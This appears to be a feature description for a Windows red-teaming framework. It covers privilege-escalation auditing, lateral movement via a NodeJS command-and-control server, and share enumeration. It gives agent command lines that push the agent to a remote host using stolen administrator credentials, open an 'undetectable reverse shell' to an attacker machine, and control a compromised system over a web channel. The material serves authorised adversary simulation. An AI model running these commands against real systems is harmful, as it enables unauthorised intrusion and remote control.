0xsp mongoose red is a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks. 0xsp mongoose red version is provided to assist your needs during cybersecurity simulation, by using this version you will be able to audit a targeted windows operation system for system vulnerabilities, misconfiguration, and privilege escalation attacks and replicate the tactics and techniques of an advanced adversary in a network.
despite the prior version was focusing on hunting for privilege escalation attacks and misconfigurations, the newer version has been upgraded to cover the ability to replicate techniques of an adversary in a network. with node JS support for the web application interface, the agent underwent a much-needed overhaul to present these options in an approachable way.
once you start a mongoose agent you can select lateral movement technique with a -lr command, followed by suppling required access credentials and NodeJS address to pass the command directly from C2 into the agent and then deploy it into the attacked system.
agent.exe -lr -host 192.168.14.1 -username administrator -password blabla -srvhost NodeJS-C2-IP
connected devices and shares
one of the important enumeration strategies on the windows environment is to retrieve all connected entities and available shares for a tested system.
weaponization of run-as-user
while conducting a test on a system, you may able to retrieve some of the accounts credentials and you would like to use it for verification or escalation of privileges. by this feature, you can abuse the function of run-as-user to establish an undetectable reverse shell from the tested system into your attacker machine.
agent.exe -r accountname password cmd.exe [*] SET RHOST > [*] SET RPORT >
bidirectional communication channel-T1102-002
a feature of 0xsp mongoose red means for sending commands to and receiving output from a compromised system over the Web service channel.
agent.exe -cmd -srvhost NodeJSIP -x password